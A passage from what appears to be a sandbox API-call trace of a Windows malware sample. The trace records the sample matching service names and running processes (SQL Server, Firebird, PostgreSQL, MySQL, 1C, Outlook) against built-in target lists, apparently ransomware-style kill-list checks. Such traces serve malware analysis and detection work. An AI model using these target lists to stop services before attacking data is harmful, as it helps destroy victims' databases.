lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0037.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0037.122] lstrlenW (lpString="netprofm") returned 8 [0037.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0037.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0037.123] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0037.123] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0037.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0037.123] lstrlenW (lpString="NlaSvc") returned 6 [0037.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0037.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0037.123] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0037.123] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0037.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0037.123] lstrlenW (lpString="nsi") returned 3 [0037.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0037.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0037.123] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0037.123] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0037.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0037.123] lstrlenW (lpString="PcaSvc") returned 6 [0037.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0037.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0037.123] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0037.123] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0037.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0037.123] lstrlenW (lpString="PlugPlay") returned 8 [0037.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0037.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0037.123] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0037.123] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0037.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0037.123] lstrlenW (lpString="Power") returned 5 [0037.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0037.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0037.123] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0037.123] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0037.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0037.123] lstrlenW (lpString="ProfSvc") returned 7 [0037.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0037.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0037.124] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0037.124] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0037.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0037.124] lstrlenW (lpString="RpcEptMapper") returned 12 [0037.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0037.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0037.124] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0037.124] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0037.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0037.124] lstrlenW (lpString="RpcSs") returned 5 [0037.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0037.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0037.124] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0037.124] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0037.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0037.124] lstrlenW (lpString="SamSs") returned 5 [0037.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0037.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0037.124] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0037.124] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0037.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0037.124] lstrlenW (lpString="Schedule") returned 8 [0037.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0037.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0037.124] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0037.124] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0037.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0037.124] lstrlenW (lpString="SENS") returned 4 [0037.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0037.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0037.124] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0037.124] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0037.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0037.124] lstrlenW (lpString="ShellHWDetection") returned 16 [0037.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0037.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0037.125] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0037.125] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0037.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0037.125] lstrlenW (lpString="Spooler") returned 7 [0037.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0037.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0037.125] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0037.125] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0037.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0037.125] lstrlenW (lpString="SysMain") returned 7 [0037.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0037.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0037.125] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0037.125] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0037.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0037.125] lstrlenW (lpString="Themes") returned 6 [0037.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0037.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0037.125] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0037.125] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0037.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0037.125] lstrlenW (lpString="TrkWks") returned 6 [0037.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0037.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0037.125] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0037.125] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0037.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0037.125] lstrlenW (lpString="UxSms") returned 5 [0037.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0037.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0037.125] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0037.125] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0037.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0037.126] lstrlenW (lpString="WdiServiceHost") returned 14 [0037.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0037.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0037.126] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0037.126] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0037.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0037.126] lstrlenW (lpString="WdiSystemHost") returned 13 [0037.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0037.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0037.126] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0037.126] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0037.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0037.126] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0037.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0037.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0037.126] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0037.126] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0037.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0037.126] lstrlenW (lpString="Winmgmt") returned 7 [0037.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0037.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0037.126] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0037.126] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0037.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0037.126] lstrlenW (lpString="WPDBusEnum") returned 10 [0037.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0037.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0037.126] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0037.126] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0037.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0037.126] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c9078 | out: hHeap=0x570000) returned 1 [0037.126] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0037.129] Process32FirstW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0037.129] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0037.130] lstrlenW (lpString="System") returned 6 [0037.130] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0037.130] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0037.130] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0037.130] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0037.130] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0037.130] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0037.130] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0037.130] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0037.131] lstrlenW (lpString="smss.exe") returned 8 [0037.131] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0037.131] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0037.131] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0037.131] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0037.131] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0037.131] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0037.131] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0037.131] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0037.132] lstrlenW (lpString="csrss.exe") returned 9 [0037.132] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0037.132] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0037.132] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0037.132] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0037.132] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0037.132] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0037.132] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0037.132] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0037.133] lstrlenW (lpString="wininit.exe") returned 11 [0037.133] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0037.133] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0037.133] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0037.133] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0037.133] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0037.133] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0037.133] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0037.133] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0037.134] lstrlenW (lpString="csrss.exe") returned 9 [0037.134] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0037.134] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0037.134] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0037.134] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0037.134] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0037.134] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0037.134] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0037.134] lstrlenW (lpString="winlogon.exe") returned 12 [0037.134] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0037.135] lstrlenW (lpString="services.exe") returned 12 [0037.135] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0037.136] lstrlenW (lpString="lsass.exe") returned 9 [0037.136] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0037.136] lstrlenW (lpString="lsm.exe") returned 7 [0037.137] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.137] lstrlenW (lpString="svchost.exe") returned 11 [0037.138] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.138] lstrlenW (lpString="svchost.exe") returned 11 [0037.138] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.139] lstrlenW (lpString="svchost.exe") returned 11 [0037.139] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.140] lstrlenW (lpString="svchost.exe") returned 11 [0037.140] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.140] lstrlenW (lpString="svchost.exe") returned 11 [0037.140] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0037.141] lstrlenW (lpString="audiodg.exe") returned 11 [0037.141] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.142] lstrlenW (lpString="svchost.exe") returned 11 [0037.142] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.142] lstrlenW (lpString="svchost.exe") returned 11 [0037.142] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0037.143] lstrlenW (lpString="dwm.exe") returned 7 [0037.143] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0037.144] lstrlenW (lpString="explorer.exe") returned 12 [0037.144] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0037.145] lstrlenW (lpString="spoolsv.exe") returned 11 [0037.145] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0037.145] lstrlenW (lpString="taskhost.exe") returned 12 [0037.145] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.146] lstrlenW (lpString="svchost.exe") returned 11 [0037.146] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0037.147] lstrlenW (lpString="taskeng.exe") returned 11 [0037.147] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0037.147] lstrlenW (lpString="taskhost.exe") returned 12 [0037.147] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0037.148] lstrlenW (lpString="called.exe") returned 10 [0037.148] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0037.149] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0037.149] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0037.149] lstrlenW (lpString="analyst.exe") returned 11 [0037.149] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0037.150] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0037.150] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0037.151] lstrlenW (lpString="wages.exe") returned 9 [0037.151] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0037.561] lstrlenW (lpString="rand.exe") returned 8 [0037.562] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0037.574] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0037.576] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0037.584] lstrlenW (lpString="cottage.exe") returned 11 [0037.584] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0037.585] lstrlenW (lpString="pairs_spec.exe") returned 14 [0037.585] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, 